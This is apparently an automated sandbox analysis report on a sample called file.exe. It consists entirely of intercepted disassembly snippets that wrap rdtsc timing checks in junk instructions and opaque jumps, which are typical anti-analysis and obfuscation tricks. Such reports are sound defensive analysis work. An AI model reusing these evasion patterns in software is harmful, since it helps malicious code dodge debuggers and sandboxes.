              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C3DC second address: 78C3E6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F292CD65AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C8F5 second address: 78C920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F292CD152E6h 0x0000000a jng 00007F292CD152E6h 0x00000010 popad 0x00000011 push esi 0x00000012 jmp 00007F292CD152F4h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D4D0 second address: 78D4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F292CD65AAAh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D4DF second address: 78D4EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jc 00007F292CD152E6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78084A second address: 780865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780865 second address: 78087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F292CD152EDh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793083 second address: 793087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791A4B second address: 791A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791A50 second address: 791A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7932E7 second address: 7932ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7932ED second address: 7932F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F292CD65AA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7932F7 second address: 79335E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F292CD152F2h 0x0000000f jmp 00007F292CD152EDh 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jng 00007F292CD152ECh 0x00000020 jl 00007F292CD152E6h 0x00000026 jg 00007F292CD152ECh 0x0000002c popad 0x0000002d mov eax, dword ptr [eax] 0x0000002f jmp 00007F292CD152F4h 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79335E second address: 793369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F292CD65AA6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794710 second address: 794724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794724 second address: 79472A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79472A second address: 79472E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79472E second address: 79474D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F292CD65AB2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79474D second address: 794762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F0h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794762 second address: 794767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794767 second address: 794784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BEDA second address: 79BEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BEDE second address: 79BEE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BF8D second address: 79BF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79BF94 second address: 79BFAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F292CD152E6h 0x00000009 jns 00007F292CD152E6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79C591 second address: 79C595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79C756 second address: 79C75B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79C75B second address: 79C761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79CD2B second address: 79CD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79CEEA second address: 79CEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D8ED second address: 79D8F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79FFB0 second address: 79FFBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F292CD65AA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79FFBA second address: 79FFBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0902 second address: 7A0940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F292CD65AB4h 0x0000000e popad 0x0000000f nop 0x00000010 add dword ptr [ebp+122D185Eh], ecx 0x00000016 push 00000000h 0x00000018 xor edi, dword ptr [ebp+122D294Bh] 0x0000001e push 00000000h 0x00000020 movzx edi, cx 0x00000023 xchg eax, ebx 0x00000024 push edi 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0940 second address: 7A0970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F8h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jc 00007F292CD152E6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F292CD152E6h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A06EF second address: 7A070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1E54 second address: 7A1E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1E58 second address: 7A1E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1E5C second address: 7A1EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F292CD152E8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov esi, dword ptr [ebp+122D1A29h] 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007F292CD152E8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 pushad 0x00000046 mov dword ptr [ebp+122D30F0h], ecx 0x0000004c mov dx, 8F46h 0x00000050 popad 0x00000051 jmp 00007F292CD152F8h 0x00000056 xchg eax, ebx 0x00000057 jo 00007F292CD152F8h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1EDA second address: 7A1EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1EDE second address: 7A1EF7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F292CD152E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F292CD152ECh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A270D second address: 7A2713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5699 second address: 7A569D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A569D second address: 7A56A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A56A1 second address: 7A56BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F292CD152ECh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F292CD152E6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A56BF second address: 7A56C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A56C3 second address: 7A56C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5BBA second address: 7A5C34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F292CD65AA8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov ebx, eax 0x00000026 push 00000000h 0x00000028 jnl 00007F292CD65AACh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F292CD65AA8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov bx, 1A72h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5C34 second address: 7A5C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5C38 second address: 7A5C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA28D second address: 7AA2A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F292CD152F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758895 second address: 758899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAAD9 second address: 7AAADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758899 second address: 7588BA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F292CD65AA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e jmp 00007F292CD65AB1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAADD second address: 7AAAF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F292CD152EBh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F292CD152E6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7588BA second address: 7588C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAAF9 second address: 7AAB03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AAB03 second address: 7AAB07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE1C6 second address: 7AE235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F292CD152F6h 0x00000008 jng 00007F292CD152E6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 pop ecx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F292CD152E8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 ja 00007F292CD152ECh 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D2A7Dh], ebx 0x00000041 push 00000000h 0x00000043 mov ebx, 52BE9404h 0x00000048 xchg eax, esi 0x00000049 push edi 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE235 second address: 7AE239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE239 second address: 7AE25C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F292CD152F8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF1D9 second address: 7AF248 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F292CD65AB5h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F292CD65AA8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov bl, 96h 0x0000002d push 00000000h 0x0000002f mov bl, 97h 0x00000031 call 00007F292CD65AB3h 0x00000036 mov edi, dword ptr [ebp+122D390Bh] 0x0000003c pop ebx 0x0000003d push eax 0x0000003e jo 00007F292CD65AB0h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF375 second address: 7AF382 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F292CD152E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B115E second address: 7B1168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1168 second address: 7B11A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bh, 6Bh 0x0000000c movzx ebx, dx 0x0000000f push 00000000h 0x00000011 mov ebx, dword ptr [ebp+122D19B2h] 0x00000017 push 00000000h 0x00000019 mov ebx, dword ptr [ebp+122D39E3h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jnl 00007F292CD152F8h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0313 second address: 7B0317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0317 second address: 7B031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B72BC second address: 7B72E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F292CD65AA6h 0x00000009 jmp 00007F292CD65AB2h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F292CD65AACh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B92EA second address: 7B9307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9307 second address: 7B930B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B930B second address: 7B9327 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007F292CD152F0h 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9327 second address: 7B932C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B932C second address: 7B9388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+122D1CAAh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F292CD152E8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov ebx, edx 0x00000030 mov edi, dword ptr [ebp+122D2B6Dh] 0x00000036 jmp 00007F292CD152F0h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F292CD152EDh 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9388 second address: 7B9392 instructions: 0x00000000 rdtsc 0x00000002 js 00007F292CD65AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B32EC second address: 7B3301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jne 00007F292CD152E6h 0x0000000e jno 00007F292CD152E6h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B426C second address: 7B4270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6388 second address: 7B638D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7533 second address: 7B7539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7539 second address: 7B753D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B753D second address: 7B7541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8546 second address: 7B854D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B854D second address: 7B8552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8614 second address: 7B8618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B95B9 second address: 7B95BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD781 second address: 7BD78B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F292CD152ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C22ED second address: 7C22F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C22F2 second address: 7C22F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C22F8 second address: 7C22FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C258D second address: 7C25A5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F292CD152E6h 0x00000008 jnp 00007F292CD152E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F292CD152E6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C88D7 second address: 7C88DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CABAE second address: 7CABB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CABB4 second address: 7CABC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F292CD65AADh 0x00000009 rdtsc
